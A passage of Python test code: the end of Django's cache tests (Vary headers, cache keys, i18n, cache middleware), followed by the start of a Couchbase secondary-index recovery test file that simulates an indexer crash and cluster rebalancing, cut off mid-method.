('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
recovery_gsi.py
|
import logging
from threading import Thread
import time
from .base_gsi import BaseSecondaryIndexingTests
from couchbase.n1ql import CONSISTENCY_REQUEST
from couchbase_helper.query_definitions import QueryDefinition
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
log = logging.getLogger(__name__)
class SecondaryIndexingRecoveryTests(BaseSecondaryIndexingTests):
def setUp(self):
self.use_replica = True
super(SecondaryIndexingRecoveryTests, self).setUp()
self.load_query_definitions = []
self.initial_index_number = self.input.param("initial_index_number", 10)
for x in range(self.initial_index_number):
index_name = "index_name_" + str(x)
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
if self.load_query_definitions:
self.multi_create_index(buckets=self.buckets,
query_definitions=self.load_query_definitions)
def tearDown(self):
if hasattr(self, 'query_definitions') and not self.skip_cleanup:
try:
self.log.info("<<<<<< WILL DROP THE INDEXES >>>>>")
tasks = self.async_multi_drop_index(
buckets=self.buckets, query_definitions=self.query_definitions)
for task in tasks:
task.result()
self.async_multi_drop_index(
buckets=self.buckets, query_definitions=self.load_query_definitions)
except Exception as ex:
log.info(ex)
super(SecondaryIndexingRecoveryTests, self).tearDown()
'''Test that checks if indexes that are ready during index warmup can be used'''
def test_use_index_during_warmup(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
create_index_query = "CREATE INDEX idx ON default(age)"
create_index_query2 = "CREATE INDEX idx1 ON default(age)"
create_index_query3 = "CREATE INDEX idx2 ON default(age)"
create_index_query4 = "CREATE INDEX idx3 ON default(age)"
create_index_query5 = "CREATE INDEX idx4 ON default(age)"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query5,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
master_rest = RestConnection(self.master)
self.shell.execute_cbworkloadgen(master_rest.username, master_rest.password, 700000, 100, "default", 1024, '-j')
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
self.assertTrue(index_stats["indexer_state"].lower() != 'warmup')
# Sleep for 60 seconds to allow a snapshot to be created
self.sleep(60)
t1 = Thread(target=self.monitor_index_stats, name="monitor_index_stats", args=([index_node, 60]))
t1.start()
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
t1.join()
use_index_query = "select * from default where age > 30"
# Results are not garunteed to be accurate so the query successfully running is all we can check
try:
results = self.n1ql_helper.run_cbq_query(query=use_index_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("query should run correctly, an index is available for use")
'''Ensure that the index is in warmup, but there is an index ready to be used'''
def monitor_index_stats(self, index_node=None, timeout=600):
index_usable = False
rest = RestConnection(index_node)
init_time = time.time()
next_time = init_time
while not index_usable:
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
index_map = self.get_index_map()
if index_stats["indexer_state"].lower() == 'warmup':
for index in index_map['default']:
if index_map['default'][index]['status'] == 'Ready':
index_usable = True
break
else:
next_time = time.time()
index_usable = index_usable or (next_time - init_time > timeout)
return
def test_rebalance_in(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
[], services=self.services_in)
mid_recovery_tasks = self.async_run_operations(
phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_out(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], self.nodes_out_list)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_in_out(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_in_out_multi_nodes(self):
"""
MB-16220
1. Create cluster + Indexes
2. Run Queries
3. Rebalance out DAta and Rebalance In Data node.
4. Rebalance out Index and Rebalance in Index Node.
"""
try:
extra_nodes = self.servers[self.nodes_init:]
self.assertGreaterEqual(
len(extra_nodes), 2,
"Sufficient nodes not available for rebalance")
self.nodes_out = 1
self.nodes_in_list = [extra_nodes[0]]
self.nodes_out_dist = "kv:1"
self.services_in = ["kv"]
self.targetMaster = False
self.generate_map_nodes_out_dist()
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list,
services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.nodes_out_dist = "index:1"
self.services_in = ["index"]
self.nodes_in_list = [extra_nodes[1]]
self.generate_map_nodes_out_dist()
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_with_stop_start(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
stopped = RestConnection(self.master).stop_rebalance(
wait_timeout=self.wait_timeout // 3)
